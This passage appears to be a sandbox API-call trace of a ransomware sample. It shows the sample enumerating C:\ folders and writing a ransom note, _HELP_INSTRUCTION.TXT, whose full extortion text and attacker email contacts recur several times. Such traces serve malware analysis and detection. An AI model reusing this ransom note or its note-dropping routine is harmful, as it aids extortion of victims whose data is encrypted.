possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.390] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.398] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.398] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.398] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.398] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.398] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0099.398] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0099.398] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.398] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.398] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0099.398] SetErrorMode (uMode=0x1) returned 0x1 [0099.398] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0099.398] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0099.398] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0099.398] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0099.398] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.399] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0099.399] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0099.399] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.399] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0099.399] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0099.399] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="Desktop") returned 0x0 [0099.399] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="DESKTOP") returned 0x0 [0099.399] SetErrorMode (uMode=0x1) returned 0x1 [0099.399] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files\\_HELP_INSTRUCTION.TXT") returned 38 [0099.399] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.399] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.399] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.399] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cad0f8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cad0f8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.399] RegCloseKey (hKey=0x290) returned 0x0 [0099.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.400] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.400] CreateFileW (lpFileName="C:\\Program Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0099.400] CloseHandle (hObject=0x290) returned 1 [0099.400] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.400] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0099.400] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0099.400] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.400] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.400] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0099.400] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0099.400] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.400] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.400] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0099.400] SetErrorMode (uMode=0x1) returned 0x1 [0099.400] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0099.400] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0099.400] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0099.401] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0099.401] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.401] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0099.401] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0099.401] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.401] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0099.401] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0099.401] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="Desktop") returned 0x0 [0099.401] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="DESKTOP") returned 0x0 [0099.401] SetErrorMode (uMode=0x1) returned 0x1 [0099.401] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT") returned 44 [0099.401] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.401] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.401] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.401] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cad328, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cad328*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.401] RegCloseKey (hKey=0x290) returned 0x0 [0099.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.402] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files (x86)\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0099.402] CloseHandle (hObject=0x290) returned 1 [0099.402] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.402] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0099.402] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0099.402] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.402] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.402] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0099.402] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0099.402] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.402] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.402] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0099.402] SetErrorMode (uMode=0x1) returned 0x1 [0099.402] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0099.402] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0099.402] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0099.402] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0099.403] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.403] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0099.403] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0099.403] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.403] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0099.403] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0099.403] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="Desktop") returned 0x0 [0099.403] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="DESKTOP") returned 0x0 [0099.403] SetErrorMode (uMode=0x1) returned 0x1 [0099.403] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\ProgramData\\_HELP_INSTRUCTION.TXT") returned 36 [0099.403] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.403] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.403] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.403] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cad558, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cad558*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.403] RegCloseKey (hKey=0x290) returned 0x0 [0099.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.403] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.404] CreateFileW (lpFileName="C:\\ProgramData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\programdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0099.405] CloseHandle (hObject=0x290) returned 1 [0099.405] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.406] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0099.406] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0099.406] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.406] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.406] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0099.406] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0099.406] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.406] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.406] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0099.406] SetErrorMode (uMode=0x1) returned 0x1 [0099.406] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0099.406] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0099.406] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0099.406] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0099.406] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.409] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.409] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0099.409] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0099.409] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="Desktop") returned 0x0 [0099.409] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="DESKTOP") returned 0x0 [0099.409] SetErrorMode (uMode=0x1) returned 0x1 [0099.410] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Recovery\\_HELP_INSTRUCTION.TXT") returned 33 [0099.410] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.410] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.410] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.410] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cad788, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cad788*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.410] RegCloseKey (hKey=0x290) returned 0x0 [0099.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.410] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.410] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.410] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.410] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.411] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.411] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.411] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0099.411] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0099.411] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.411] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.411] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0099.411] SetErrorMode (uMode=0x1) returned 0x1 [0099.411] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0099.411] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0099.411] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0099.411] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0099.411] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.411] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.411] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0099.411] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0099.411] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="Desktop") returned 0x0 [0099.411] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="DESKTOP") returned 0x0 [0099.411] SetErrorMode (uMode=0x1) returned 0x1 [0099.411] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT") returned 50 [0099.411] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.412] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.412] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.412] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cad9b8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cad9b8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.412] RegCloseKey (hKey=0x290) returned 0x0 [0099.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.412] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.412] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.412] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.412] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.412] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.412] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.412] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0099.412] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0099.412] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.412] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") 